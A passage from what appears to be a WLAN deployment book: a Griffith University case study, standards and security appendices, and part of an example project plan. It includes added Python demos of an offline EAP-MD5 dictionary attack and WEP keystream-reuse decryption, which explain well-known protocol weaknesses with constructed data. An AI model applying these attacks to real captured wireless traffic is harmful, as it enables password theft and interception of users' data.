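Added example (not Griffith University's or the vendor's tooling).
Sample zones are constructed.
"""
import math

MAX_USERS_PER_AP = 15         # the university's concurrent-session cap per AP
MIN_EDGE_SIGNAL_PCT = 50      # Aironet Client Utility reading required at each edge
EDGE_MEASUREMENTS = 4         # readings taken at the extreme edges of the zone
# Rooms served per AP by wall type; 3 chosen from "two to three" (assumption).
ROOMS_PER_AP = {"concrete": 1, "plasterboard": 3}


def aps_required(wall_type, rooms, peak_users):
    """Larger of the wall-type baseline and the 15-users-per-AP capacity rule."""
    if wall_type not in ROOMS_PER_AP:
        raise ValueError(f"unknown wall type {wall_type!r}")
    by_walls = math.ceil(rooms / ROOMS_PER_AP[wall_type])
    by_capacity = math.ceil(peak_users / MAX_USERS_PER_AP)
    return max(by_walls, by_capacity)


def weak_edges(readings):
    """Indices of the edge readings that fall below the 50 percent benchmark."""
    if len(readings) != EDGE_MEASUREMENTS:
        raise ValueError(f"expected {EDGE_MEASUREMENTS} edge readings, got {len(readings)}")
    return [i for i, r in enumerate(readings) if r < MIN_EDGE_SIGNAL_PCT]


def review_zone(zone):
    """Planning verdict for one Smart Zone: AP shortfall and coverage result."""
    need = aps_required(zone["walls"], zone["rooms"], zone["peak_users"])
    weak = weak_edges(zone["edge_signal_pct"])
    return {
        "zone": zone["name"],
        "aps_required": need,
        "ap_shortfall": max(0, need - zone["aps_installed"]),
        "coverage_ok": not weak,
        "weak_edges": weak,   # a non-empty list means a high-gain antenna or another AP is needed
    }


# Constructed zones. The first follows the Gold Coast numbers on the page
# (about 40 peak users, three APs); the room count there is an assumption.
SAMPLE_ZONES = [
    {"name": "gc-learning-centre", "walls": "plasterboard", "rooms": 1,
     "peak_users": 40, "aps_installed": 3, "edge_signal_pct": [72, 65, 58, 61]},
    {"name": "na-seminar-block", "walls": "concrete", "rooms": 4,
     "peak_users": 20, "aps_installed": 3, "edge_signal_pct": [55, 62, 48, 70]},
]

if __name__ == "__main__":
    for z in SAMPLE_ZONES:
        print(review_zone(z))
```

Capacity, not wall material, decides the Gold Coast case: one large open room still needs three APs once 40 users are expected, which is exactly what the university installed.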

Cabling
During Phase Three, it was decided that two cables per access point would be installed. Originally, this
provision was to allow for an extra access point to be installed in the future, should demand increase.
However, university IT staff discovered that they could use the second cable for console access,
providing out-of-band (OOB) management capabilities. This capability has proven to be of great
assistance to the IT staff, not least because of the extended nature of the university's wireless
network, which is spread over five campus locations. Two cables per access point now form part of the
Office of Facilities Management (OFM) building standard.

Access Point Configuration


The site survey vendor configured the access points, working from a template and detailed work
instructions, which expedited the deployment and avoided university staff resourcing problems.

Testing
Upon physical installation of the access points by the site survey vendor, the access points were
configured and tested. During each deployment phase and before the service was launched in each area,
the WLAN was tested again by IT staff, and coverage maps were generated. Only after service
availability was validated were the areas added to the web portal and the WLAN made available to users
in that locality.

Ongoing Project Management and Process


Griffith University uses an internally developed and fairly mature project methodology, based upon a
typical staged gate approach. Initially, a technical impact statement was produced, detailing the
technology, integration, security risks, and proposed high-level architecture. Following this, a business
case document was produced that was evaluated and approved by the project advisory group, made up
of senior IT management. The project advisory group was assisted by a separate technical advisory
group, which focused on the detailed technological, architectural, and security issues.
Upon approval, a project implementation plan was created, and the product evaluation process began,
followed shortly thereafter by the detailed design, pilot, and Phase One deployments. Throughout the
project, a steering committee of business stakeholders met on a monthly basis for project updates and
to track deviations from the plan.
A dedicated project manager, a member of the network and communications services team, managed
the project from start to finish.

Challenges
The primary challenge that the Network and Communications Services group faced was convincing each
separate support group to embrace the solution in its entirety. "The issue that caused me the most
trouble was support," says Bruce Scott. Personalized attention was critical, as was ensuring that the
support organizations were part of the first deployments; this included those inside Scott's group and
those from other departments. This solution ensured that the IT staff, who would be responsible for the
success of the solution, were among the first to benefit from the WLAN. Scott's team continues to
provide training and transfer of information (TOI) sessions to all technical organizations within the
university on a periodic basis.
Another challenge was simply delaying the adoption and widespread deployment of WLANs in general,
until such time as an approved, secure, and supportable solution and architecture was developed by the
Network and Communications Services group. "[We] caught a beating in the early days," recounts Scott,
"but it was worth it in the end." The university now enjoys a robust solution based on proven
technology, and it avoided much of the security and technical risks associated with early adoption and
trailblazing.
Finally, although the university's technical teams defined a very secure solution (based on a VPN
overlay), the physical security of the access points was of particular concern in an open educational
environment. Many of the access points are placed in open areas, with a high degree of public foot
traffic, whereas others are in more secluded areas. Both locations present potential vulnerabilities to
theft of or interference with the access points. To address this problem, the university chose to conceal
the physical location of the access points and to secure them with locks. This solution has been
successful: with more than 300 access points installed and more than 30,000 students, not a single
incident of physical theft or disruption has occurred.

Lessons Learned and Recommendations


When asked to describe lessons learned, Bruce Scott and David Renaud provided the following five
recommendations.

Sort Out Support Up Front


Define your support model and ensure that it works. University staff members have been very active in
ensuring that users can access the WLAN easily and securely. The solution will fail if users cannot
depend on reliable WLAN service. The work David's team put into ensuring a positive user experience
and a robust support model has ensured the success of the solution.

Build a Solid and Well-Tested Architecture


Scott recommends that you design, build, test, and pilot the architecture before undertaking a wide-scale
deployment. Phased implementation also allows for the incremental introduction of the solution, along
with spreading the support load and ensuring that IT staff are trained and familiar with the service.
Not only did Scott and Renaud's team pilot its architecture and validate its technical and security stability
with an incremental deployment, but it also commissioned independent audits. The university's WLAN
solution was audited by Queensland Audit Office, an independent State Government body that assists
the Auditor-General of Queensland in providing independent audit services to the Queensland Parliament
and all state public sector entities and local governments in Queensland.
Furthermore, the wireless network was certified as Secure by Electronic Warfare Associates Australia, a
commercial but independent security analysis and vulnerability auditing corporation. EWA-Australia is
part of the global Electronic Warfare Associates corporation, based in Herndon, Virginia.

Understand Your Users


Renaud advises, "Ask your users what they want and where they want it." By surveying the university
faculty and student bodies, Scott's team was able to tailor, design, and implement a solution that was
much more likely to succeed, rather than simply deploying on a standard rolling basis.
Two surveys were undertaken: one for students and the other for academic staff. Satisfying explicit and
validated user requirements therefore formed a fundamental part of the design process. The web portal
also contains a "Have Your Say" feedback feature that allows users and staff to submit suggestions,
complaints, and requests. Scott's group makes it a priority to address these requests and reported
issues as they come up.
Furthermore, a Post Implementation Review survey was undertaken to quantify client satisfaction and
identify potential problem areas, including dead spots. The survey results will form part of the planned
fourth phase of deployment, with the university fine-tuning the solution.

Note
Griffith University's use of a Post Implementation Review is an excellent example of an
organization putting into action the optimize phase of the PPDIOO solutions lifecycle. By the
university ensuring that it is reactive to user requirements and the WLAN is fine-tuned, it
optimizes the solution and ensures continued success and client satisfaction.

Establish a Web Portal


The use of a comprehensive web portal has been critical to the success of Griffith University's WLAN.
Wireless@Griffith contains comprehensive solutions information, including interactive coverage maps,
training, trending reports, and more. Not only is a significant number of FAQs included, but the web
portal also includes up-to-date coverage maps at a campus level. Users can click on individual buildings
and drill down to floors and even rooms. Furthermore, coverage maps provide digital photographs of
every location and room where service is provided. Comprehensive links are provided not only to
external resources, including technical support pages for common WLAN vendors (Linksys, Apple, Dell,
and so on), but also to independent WLAN technical resources for those interested in the technology,
wireless industry, news, and market trends. Finally, user feedback is encouraged by the use of a "Have
Your Say" feature. University IT staff members carefully monitor user feedback and react to their
concerns and requests, again ensuring client satisfaction and the success of the solution.

Integrate the Solution into Existing Business Processes


The university already used a dedicated web-based reservation system for all bookable rooms in every
campus. This system was enhanced with specific details on what rooms and areas had wireless
connectivity. The WLAN was integrated into existing business processes, and at the same time, visibility
of the features was increased. By advertising wireless connectivity and therefore encouraging staff and
users to select wireless-enabled areas, and by providing a user-friendly web portal with
contemporaneous usage statistics, interactive coverage maps, and online feedback features, the wireless
network at Griffith University has become more than a simple 802.11g network. It has become a very
popular addition to the suite of services offered by the Information and Communication Technology Staff
group.
Furthermore, installation of dedicated wireless data outlets (above ceiling tiles in Griffith's case) was
added to the university's standard building design guidelines. At Griffith University, IT staff initiated this
decision early in the deployment process. They work closely with the university's office of facilities
management to ensure that all new buildings and refurbishments have wireless data outlets installed and
APs supplied, ready to be deployed as part of the standard building fit-out or refurbishment process.

Measuring the Benefits


The WLAN is the biggest PR win the IT organization has ever had.
David Renaud, wireless network support engineer
In a recent analysis of user trends at the university, Scott noted that the solution has recorded more
than 100,000 discrete logins in a six-month period. User adoption has been much greater than expected.
On a daily basis, the WLAN enjoys on average more than 200 concurrent sessions. At a minimum, the
connectivity this provides to the student body and faculty is equivalent to almost seven additional 30-PC
computer labs. Furthermore, adoption continues to grow.
Because the service is spread over the five campus locations and provides connectivity on a demand
basis at locations convenient to students and staff, the benefits are dramatic. "Students love it," opines
Scott, the manager of the team responsible for the design and deployment of the solution. This view has
been borne out by the facts. During the first six months of 2005, there were more than 4,000 regular
users of the solution, and this number is expected to rise to even higher levels in the future. Even at the
current level, this number represents approximately 12 percent of the total student population and
nearly 25 percent of all laptop users (based on 2005 student numbers).

What the Future Holds


Scott's team plans on deploying a fourth phase of the WLAN. This phase will cover any dead spots
identified by the university's staff, but it will also react to user feedback and requests collected through
the solution's online user feedback feature. Phase Four will also cover nearly all PhD and research
spaces. Consultation with all faculty members and input from all IT support teams are being used to
determine which spaces will be covered.
Additionally, a pilot of 802.11-based wireless phones will be undertaken soon. Planned as a replacement
of existing pagers and two-way radios, the university's PABX is already capable of supporting VoIP, a
critical requirement for WiFi-based IP telephony.

Summary
Griffith University has succeeded in designing and deploying a very successful and popular wireless LAN
by focusing on business value and user requirements.
The university decided to deploy wireless LANs for both the student body and faculty in early 2004 on an
incremental, phased basis. Instead of introducing wireless LANs earlier, the university's Network and
Communications Services group waited for the technology to mature and for the group to better
understand their end-user requirements. Proactive engagement with the academic staff and student
body, including comprehensive user surveys, allowed the university to tailor the solution to exactly what
its users wanted.
The use of Smart Zones, targeted areas for wireless connectivity, allowed IT staff to carefully manage
the solution, providing a higher level of service and quality than typically experienced in institutions of
higher education.
A comprehensive web portal, Wireless@Griffith, has greatly assisted in the success of the solution.

Appendix A. Wireless LAN Standards


Reference
The standards for wireless LAN (WLAN) are part of the IEEE 802 family, which defines physical and data
link layer protocols in internetworking. The specific subset of standards that further define WLAN
protocols is covered within the 802.11 subset of working groups. This appendix describes the most
common 802.11 WLAN standards along with their proper nomenclature and a brief description. Figure A-1
illustrates the relationship of the OSI internetworking model with each individual protocol.

Figure A-1. IEEE 802.11 WLAN Standards

802.11a
  Specification: Wireless LAN Media Access Control (MAC) and Physical Layer (PHY) specifications:
  high-speed physical layer in the 5-GHz band
  Description: Defines the link protocol for devices in the 5-GHz spectrum. Uses Orthogonal Frequency
  Division Multiplexing (OFDM) for modulation.

802.11b
  Specification: Higher Speed PHY extension in the 2.4-GHz band
  Description: Defines the link protocol for devices in the 2.4-GHz spectrum. Uses Direct Sequence
  Spread Spectrum (DSSS) for modulation.

802.11d
  Specification: Wireless LAN MAC and PHY Specifications: Specification for operation in additional
  regulatory domains
  Description: Identifies and selects operating radio frequencies within geopolitical areas.

802.11e
  Specification: Wireless MAC and PHY specifications: MAC Quality of Service (QoS) enhancements
  Description: In progress. Enhances 802.11 to provide QoS. Is key to providing voice and video in
  WLAN.

802.11f
  Specification: Recommended practice for multivendor access point interoperability via an Inter-Access
  Point Protocol across distribution systems supporting IEEE 802.11
  Description: Provides IAPP for multi-vendor AP interoperability across a distribution system supporting
  802.11 links.

802.11g
  Specification: Further higher data rate extensions in the 2.4-GHz band
  Description: Defines the extension for data rates in the 2.4-GHz spectrum. Uses OFDM for modulation.

802.11h
  Specification: Spectrum and Transmit Power Management Extensions in the 5-GHz band in Europe
  Description: Specifies Dynamic Frequency Selection (DFS) and Transmit Power Control (TPC), allowing
  operation of 5-GHz bands in Europe. Potentially will pave the way for additional channels for 802.11
  in North America.

802.11i
  Specification: Wireless LAN MAC security enhancements
  Description: Enhances 802.11 to provide security and authentication mechanisms.

802.11j
  Specification: Wireless LAN MAC and PHY specifications, Amendment 7: 4.9 GHz to 5 GHz Operation
  in Japan
  Description: Enhances 802.11a PHY and 802.11 MAC to allow operation of 4.9-GHz and 5-GHz bands
  in Japan. Includes World SKU radio, Outdoor OFDM, and 10-MHz channel spacing.

802.11k
  Specification: Radio Resource Measurement (RRM)
  Description: In progress. Provides consistent radio and network measurements to higher layers.

Each standard addresses a specific layer in the OSI model.

Appendix B. Wireless LAN Security


References
Cisco has developed a number of resources that will help you to understand more about the safeguards,
best practices, and vulnerabilities that affect WLANs today. Additionally, many public resources that go
into further detail are available for review. This appendix lists many resources for WLAN security
information. This list is not exhaustive but will provide a strong starting point.

Cisco Resources
This section includes links to Cisco security topics and technologies.

Cisco SAFE
Cisco SAFE: Wireless LAN Security in Depth:
http://www.cisco.com/en/US/products/hw/wireless/ps430/products_white_paper09186a008009c8b3.shtml

General Wireless Security Information


Cisco Wireless LAN Security Solution: http://www.cisco.com/go/aironet/security
Cisco Aironet Wireless LAN Security Overview:
http://www.cisco.com/en/US/products/hw/wireless/ps430/prod_brochure09186a00801f7d0b.html
Wireless LAN Security White Paper:
http://www.cisco.com/en/US/products/hw/wireless/ps430/products_white_paper09186a00800b469f.shtml

Cisco-Specific EAP Protocols


Cisco EAP-FAST: Cisco EAP type developed to address "dictionary attacks." This protocol is used when
strong passwords cannot be enforced.
http://www.cisco.com/en/US/products/hw/wireless/ps430/products_qanda_item09186a00802030dc.shtml
Cisco LEAP (Lightweight EAP): Initial WLAN protocol that allows for dynamic key generation and use of
EAP to ensure authentication.
http://www.cisco.com/en/US/products/hw/wireless/ps430/products_qanda_item0900aecd801764f1.shtml

WEP
WEP is the initial encryption standard utilized by the 802.11 family of standards. The WEP specification is
defined in clause 8.2 of the 802.11 standard.
IEEE 802.11 Wireless Local Area Networks: http://grouper.ieee.org/groups/802/11/

WPA
WPA is a Wi-Fi Alliance certification, based on a draft of IEEE 802.11i, created to give vendors an
interoperable replacement for WEP before 802.11i was ratified. It uses TKIP for encryption with either
802.1x/EAP or a pre-shared key for authentication.
Wi-Fi Protected Access Overview: http://www.wi-fi.org/OpenSection/pdf/WiFi_Protected_Access_Overview.pdf

WPA2
WPA2 is the successor to WPA and introduces even greater levels of security. WPA2 is based on the ratified
IEEE 802.11i standard and requires AES-based CCMP encryption.
WPA2 page on the Wi-Fi Alliance website: http://www.wi-fi.org/OpenSection/protected_access.asp

802.1x
802.1x, Port-Based Network Access Control, is the first line of defense for LANs. It defines the framework in
which a supplicant (user or device) is authenticated through an authenticator (switch or access point) by an
authentication server before the port passes traffic, carrying EAP over the LAN (EAPOL). 802.1x does not
itself define the authentication method or the encryption used afterward.
802.1X - Port Based Network Access Control: http://www.ieee802.org/1/pages/802.1x.html

EAP Types
As part of 802.1x, numerous EAP types define how the supplicant and the authentication server prove their
identities and, in the types suited to WLANs, how keying material is derived. The 802.1x standard mandates
only the use of EAP and does not specify which method is implemented. EAP itself was defined in RFC 2284
(since replaced by RFC 3748); the RFC linked here defines the EAP-TLS method.
RFC 2716, PPP EAP TLS Authentication Protocol: http://www.ietf.org/rfc/rfc2716.txt

Note
RFC 2284 defines four initial EAP Types: Identity, Notification, NAK, and MD5-Challenge. Only
MD5-Challenge actually authenticates, and it does so one way (the server is never authenticated) and
yields no keying material, so it is unsuitable for WLANs on its own. You can learn about them in RFC 2284.

Secure Authentication, Access Control, and Data Privacy on Wireless LANs:


http://www.funk.com/radius/Solns/wlan_ody_wp.asp
EAP-SIM: http://www.ietf.org/internet-drafts/draft-haverinen-pppext-eap-sim-16.txt
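The exchange the Note above describes, as an added example that is not from the book or from Cisco: it builds and parses EAPOL-encapsulated EAP frames (Identity request/response, MD5-Challenge request/response, Success) and then runs the offline dictionary attack that a passive listener can mount against any unprotected one-way challenge/response method. Frame layouts follow 802.1X and RFC 2284, and the MD5-Challenge response is computed as in CHAP (RFC 1994). The identity, secret, challenge bytes, wordlist and the authenticator name "nas1" are constructed for the demo.

```python
"""EAP-MD5 over EAPOL: frame construction, parsing, and the offline dictionary
attack that an unprotected one-way challenge/response invites.

Added example (not from the book or Cisco). EAPOL framing follows IEEE 802.1X,
EAP framing and Types 1-4 follow RFC 2284, and the MD5-Challenge response is
computed as in CHAP (RFC 1994): MD5(Identifier || secret || challenge).
Identity, secret, challenge, wordlist and the name "nas1" are constructed.
"""
from __future__ import annotations

import hashlib
import struct

EAPOL_VERSION = 1             # 802.1X-2001
EAPOL_EAP_PACKET = 0          # EAPOL Packet Type for an encapsulated EAP packet
EAP_REQUEST, EAP_RESPONSE, EAP_SUCCESS, EAP_FAILURE = 1, 2, 3, 4
EAP_TYPES = {1: "Identity", 2: "Notification", 3: "Nak", 4: "MD5-Challenge"}


def build_eapol_eap(code: int, identifier: int, eap_type: int = 0, type_data: bytes = b"") -> bytes:
    """EAPOL header (Version, Type, Body Length) + EAP header (Code, Identifier,
    Length) + Type/Type-Data. Success and Failure carry no Type field."""
    body = bytes([eap_type]) + type_data if code in (EAP_REQUEST, EAP_RESPONSE) else b""
    eap = struct.pack("!BBH", code, identifier, 4 + len(body)) + body
    return struct.pack("!BBH", EAPOL_VERSION, EAPOL_EAP_PACKET, len(eap)) + eap


def parse_eapol_eap(frame: bytes) -> dict:
    """Parse with the length checks an authenticator should make before trusting fields."""
    if len(frame) < 4:
        raise ValueError("truncated EAPOL header")
    version, ptype, body_len = struct.unpack("!BBH", frame[:4])
    if ptype != EAPOL_EAP_PACKET:
        raise ValueError(f"EAPOL type {ptype} is not an EAP-Packet")
    eap = frame[4:4 + body_len]
    if len(eap) < 4:
        raise ValueError("truncated EAP header")
    code, identifier, eap_len = struct.unpack("!BBH", eap[:4])
    if eap_len < 4 or eap_len > len(eap):
        raise ValueError("EAP Length field inconsistent with frame")
    parsed = {"version": version, "code": code, "identifier": identifier}
    if code in (EAP_REQUEST, EAP_RESPONSE):
        if eap_len < 5:
            raise ValueError("Request/Response without Type")
        parsed["type"] = EAP_TYPES.get(eap[4], f"type-{eap[4]}")
        parsed["type_data"] = eap[5:eap_len]
    return parsed


def md5_challenge_value(identifier: int, secret: bytes, challenge: bytes) -> bytes:
    """CHAP algorithm reused by EAP-MD5: MD5(Identifier || secret || challenge)."""
    return hashlib.md5(bytes([identifier]) + secret + challenge).digest()


def md5_type_data(value: bytes, name: bytes) -> bytes:
    """MD5-Challenge Type-Data: Value-Size || Value || Name."""
    return bytes([len(value)]) + value + name


def split_md5_type_data(type_data: bytes) -> tuple[bytes, bytes]:
    size = type_data[0]
    if 1 + size > len(type_data):
        raise ValueError("Value-Size exceeds Type-Data")
    return type_data[1:1 + size], type_data[1 + size:]


def run_exchange(identity: bytes, secret: bytes, challenge: bytes, first_id: int = 7) -> list[bytes]:
    """The frames as they would appear on the air for a successful EAP-MD5 login."""
    cid = first_id + 1
    return [
        build_eapol_eap(EAP_REQUEST, first_id, 1),                          # Request/Identity
        build_eapol_eap(EAP_RESPONSE, first_id, 1, identity),               # Response/Identity
        build_eapol_eap(EAP_REQUEST, cid, 4, md5_type_data(challenge, b"nas1")),
        build_eapol_eap(EAP_RESPONSE, cid, 4,
                        md5_type_data(md5_challenge_value(cid, secret, challenge), identity)),
        build_eapol_eap(EAP_SUCCESS, cid),
    ]


def offline_dictionary_attack(frames: list[bytes], wordlist: list[bytes]) -> bytes | None:
    """A passive listener pairs the MD5-Challenge Request and Response by
    Identifier and tests candidate passwords offline; nothing is transmitted."""
    challenge = response = None
    req_id = None
    for f in frames:
        p = parse_eapol_eap(f)
        if p.get("type") != "MD5-Challenge":
            continue
        value, _name = split_md5_type_data(p["type_data"])
        if p["code"] == EAP_REQUEST:
            challenge, req_id = value, p["identifier"]
        elif p["code"] == EAP_RESPONSE and p["identifier"] == req_id:
            response = value
    if challenge is None or response is None:
        return None
    for word in wordlist:
        if md5_challenge_value(req_id, word, challenge) == response:
            return word
    return None


if __name__ == "__main__":
    capture = run_exchange(b"alice", b"winter2005", bytes(range(16)))
    for f in capture:
        print(parse_eapol_eap(f))
    print(offline_dictionary_attack(capture, [b"password", b"letmein", b"winter2005"]))
```

The attack needs only the two MD5-Challenge frames and no interaction with the network, which is why the tunneled methods (PEAP, EAP-TTLS, EAP-FAST) wrap the inner exchange in TLS and why EAP-TLS avoids passwords altogether. Note also that the supplicant never checks who issued the challenge, so a rogue access point can collect response hashes at will.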

Vulnerabilities
Vulnerabilities in WLANs have been and will continue to be exploited. The following is a listing of the well-known attacks that exist today.
Paper from the University of California, Berkeley study (2001) that found that the 24-bit IV (initialization
vector), sent in plaintext, must repeat over time, and that two frames encrypted under the same IV share an
RC4 keystream, so XORing the two ciphertexts cancels the encryption entirely.
Security of the WEP Algorithm: http://www.gta.ufrj.br/~eric/tese/artigos/wep-faq.html
FMS Attack (Fluhrer, Mantin, and Shamir, 2001, "Weaknesses in the Key Scheduling Algorithm of RC4") showed
that certain "weak" IVs leak bytes of the RC4 key. WEP has no key rotation method, so after a passive
capture of roughly 100,000 to 1,000,000 packets the static WEP key itself can be recovered.
Related reading from the University of Maryland on 802.11 authentication and WEP weaknesses:
"Your 802.11 Wireless Network Has No Clothes": http://www.cs.umd.edu/~waa/wireless.pdf
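The IV-reuse finding above, as an added example that is not from the book: a small RC4 and WEP encryptor (3-byte IV prepended in clear, CRC-32 ICV, the key-ID byte omitted), a known-plaintext keystream recovery that decrypts a second frame sent under the same IV without ever learning the WEP key, and the birthday-bound estimate of how soon a 24-bit IV repeats. Keys, IVs and payloads are constructed for the demo; it does not implement the FMS key-recovery attack itself.

```python
"""WEP keystream reuse and the 24-bit IV.

Added example (not from the book). The framing follows 802.11-1999 clause 8.2:
a 3-byte IV is prepended in clear, and payload || CRC-32 ICV is XORed with
RC4(IV || key). The key-ID byte that follows the IV on the wire is omitted.
Keys, IVs and payloads below are constructed for the demo.
"""
import math
import zlib


def rc4_keystream(key: bytes, n: int) -> bytes:
    """RC4 key scheduling plus n bytes of PRGA output."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(payload: bytes) -> bytes:
    """WEP integrity check value: CRC-32, little-endian. Linear, so not a MAC."""
    return zlib.crc32(payload).to_bytes(4, "little")


def wep_encrypt(key: bytes, iv: bytes, payload: bytes) -> bytes:
    """Return IV || (RC4(IV||key) XOR (payload || ICV))."""
    if len(iv) != 3:
        raise ValueError("WEP IV is 24 bits")
    ks = rc4_keystream(iv + key, len(payload) + 4)
    return iv + xor(payload + icv(payload), ks)


def wep_decrypt(key: bytes, frame: bytes) -> bytes:
    """Decrypt and check the ICV; raises on mismatch."""
    iv, body = frame[:3], frame[3:]
    plain = xor(body, rc4_keystream(iv + key, len(body)))
    payload, tag = plain[:-4], plain[-4:]
    if tag != icv(payload):
        raise ValueError("ICV mismatch")
    return payload


def frame_is_valid(key: bytes, frame: bytes) -> bool:
    try:
        wep_decrypt(key, frame)
        return True
    except ValueError:
        return False


def recover_keystream(frame: bytes, known_payload: bytes) -> bytes:
    """Known plaintext for one frame (say, a predictable ARP or DHCP body)
    yields the RC4 keystream for that IV: C XOR (P || ICV(P))."""
    return xor(frame[3:], known_payload + icv(known_payload))


def decrypt_with_reused_iv(known_frame: bytes, known_payload: bytes, target_frame: bytes) -> bytes:
    """Two frames under the same IV share keystream, so C1 XOR C2 = P1 XOR P2.
    Needs no knowledge of the WEP key at all."""
    if known_frame[:3] != target_frame[:3]:
        raise ValueError("different IVs: keystreams differ, attack does not apply")
    ks = recover_keystream(known_frame, known_payload)
    body = target_frame[3:]
    if len(body) > len(ks):
        raise ValueError("target longer than recovered keystream; only a prefix is readable")
    plain = xor(body, ks)
    payload, tag = plain[:-4], plain[-4:]
    if tag != icv(payload):
        raise ValueError("recovered plaintext failed ICV; keystream mismatch")
    return payload


def expected_frames_to_iv_repeat(iv_bits: int = 24) -> float:
    """Birthday bound: about sqrt(pi/2 * 2^bits) random IVs before the first repeat."""
    return math.sqrt(math.pi / 2 * 2 ** iv_bits)


def hours_to_exhaust_iv_space(frames_per_second: float, iv_bits: int = 24) -> float:
    """A sequential IV counter wraps after 2^bits frames regardless of strategy."""
    return 2 ** iv_bits / frames_per_second / 3600


if __name__ == "__main__":
    key = b"\x01\x02\x03\x04\x05"              # 40-bit WEP key (constructed)
    iv = b"\x0a\x0b\x0c"
    known = b"ARP who-has 10.0.0.1"            # body an attacker can guess
    secret = b"PIN:4321 acct:77"               # body we want to read
    f1, f2 = wep_encrypt(key, iv, known), wep_encrypt(key, iv, secret)
    print(decrypt_with_reused_iv(f1, known, f2))       # b'PIN:4321 acct:77'
    print(f"~{expected_frames_to_iv_repeat():.0f} random IVs before a repeat")
    print(f"~{hours_to_exhaust_iv_space(500):.1f} h to wrap a counter at 500 frames/s")
```

The two estimates at the end are the practical point: with random IVs a collision is expected after only about five thousand frames, and even a perfectly sequential counter wraps within hours on a busy access point, after which every frame is a keystream-reuse opportunity. This is the weakness 802.11i fixes with per-packet key mixing (TKIP) and a 48-bit packet number plus authenticated encryption (CCMP).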

Appendix C. Example Project Plan for an Enterprise-Class WLAN Deployment
The project plan explained in this appendix is an example of how a team can plan, manage, and track an
enterprise-class WLAN deployment. For illustrative purposes, the project plan makes certain
assumptions and is limited to a relatively small business. The concepts and approach are the same,
however, for larger deployments. For this example, the project commences on the first Monday of 2005
(January 3, 2005).
The project plan is not intended as a comprehensive tool or reference, but rather as an example of how
a hypothetical corporation might manage a deployment. Because most organizations have their own
approach to project management, often based on one of the many public domain methodologies, it is
important to develop a customized project plan in line with whatever methodology you adopt and to use
the example in this appendix only as a reference and inspiration for initial planning and discussion.
You can find copies of the project plan Gantt chart at the Cisco Press website dedicated to this book.
Please go to www.ciscopress.com/title/1587201259 to find a PDF of the project plan for your review,
which you can use in conjunction with this chapter.

Company Background
Example Ltd is a medium-sized enterprise with seven offices spread across California. Their corporate
headquarters (HQ) campus consists of three buildings, including one light manufacturing plant, and
houses 200 staff. Their six satellite offices are detached buildings and house between 5 and 90 employees
each. Their two smallest sales offices are excluded from the deployment, so five sites are identified for
coverage. Example Ltd has a centralized IT department based in the HQ and a varying number of local
IT support staff at its five largest sites.

The Project Plan


The project plan is organized into 11 separate sections. These are not necessarily in temporal order
because several tracks are contemporaneous with each other. You may wish to organize your own
project plan along different lines, or in line with your adopted project management methodology. The
sections of the example project plan are as follows. Each section is discussed in this appendix:
Business Issues
Discovery
Architecture
Design
Testing
Logistics
Pilot
Communications
Support
Deployment
Post Project Activities

Business Issues
The Business Issues section deals with the initial business-related issues and is primarily, but not
exclusively, concentrated at the beginning phases of the project.
A project kickoff meeting is planned, and the business goals are reviewed with a "go/no go" milestone
following. No other effort can proceed before this decision.
A project steering committee is created and regular monthly meetings scheduled. For this small project,
the project steering committee includes not only the executive sponsor and IT manager but also the
project manager and his senior network architect.

Note

In larger deployments, the project steering committee is usually an executive body that meets
on a regular basis and is updated by the project manager on project variances. The project
steering committee usually includes the executive sponsor of the initiative and senior
representatives from IT, HR, finance, facilities management, and so on.

The steering committee defines the scope of the project, including identifying which sites will be
covered. In our example, the committee decides to exclude the two small sales offices. A list of site
owners (local business and IT contacts) is compiled, and a request for comment (RFC) is created for both
the wireless equipment and the cabling.

Discovery
The Discovery phase is concentrated at the beginning of the project lifecycle. In this section of the
project, the steering committee sets aside four weeks to evaluate the equipment from various
manufacturers or solutions providers. This is sometimes known as a "manufacturer bake-off" and is a
detailed testing, evaluation, and selection process where the enterprise tests the shortlist of products,
usually in a lab environment, and selects the one most appropriate to the enterprise's need.
The equipment is finally selected, and pricing and contractual negotiations follow. For the purposes of
our sample project, it is assumed that a WLAN controller-based solution is selected. Once selected, the
enterprise purchasing department signs a contract for the supply of the equipment.
The selection of a cabling contractor occurs simultaneously because this choice is independent of the
final equipment used in the deployment. The RFC is sent to various vendors, and their responses are
evaluated. By the time the steering committee selects the equipment or solutions provider, the cabling
vendor should also have been identified.

Architecture
The Architecture section deals with the development of the high-level solutions architecture. An
architectural team is defined and regular monthly architecture meetings planned. The architecture team
will probably be limited to senior technical staff consisting of network, operations, and security
architects. The architecture team will report to the project manager and ultimately the project steering
committee.

Note
This architecture team can be considered the main drivers, reviewers, and approvers of the
solution but will probably not be involved in the detailed and specific design and configurations.
In some organizations, the architecture team and the detailed design team are the same.

The architecture team defines the high-level architecture for the solution, ensuring it is in line with

business drivers and requirements of the steering committee. At this stage, the team also defines the
security architecture. Finally a week is set aside for business review, and an architecture document is
created. The business review is where the steering committee and the CEO (in our example) review the
architecture and validate that it satisfies the business goals. This is a major milestone.

Design
After the WLAN architecture has been defined and approved, a detailed technical design can commence.
A technical design team is created and weekly meetings scheduled.

Note
While the architecture team tracks technical progress against the high-level solution
architecture, the design team is responsible for the detailed design, settings, and configuration
of the equipment. In some deployments, the architecture and design team would be combined
into one team; that is, both functions would be carried out by the same individuals.

Six weeks are set aside for drawing up a detailed technical design. This is subsequently updated with
changes that arise as a result of the test plan (see the following section, "Testing").
After a period, the detailed design document is once more revisited and updated. These updates occur
after the pilot and reflect responses to gaps, customizations, or tweaks that come to light during the
pilot.
A final detailed design guide is eventually completed. This is a major milestone.

Testing
The design team creates a lab that reflects the initial technical design, and it is integrated with Example
Ltd's existing authentication and entitlement infrastructure. Three weeks of testing follow, and the
results are documented. The findings affect (positively or negatively) the technical design, as mentioned
in the previous section.

Logistics
The Logistics section deals with the logistics of equipment ordering and delivery. Equipment is ordered
and delivered to Example Ltd's HQ; 30 days of lead time are included by way of example.
Staging follows, where the equipment is unpacked and tested, and deployment packs are created for
each site. These include the equipment required for each site, installation instructions, schematics, and
so on.
Two weeks are set aside for delivery to the four satellite offices.

Pilot
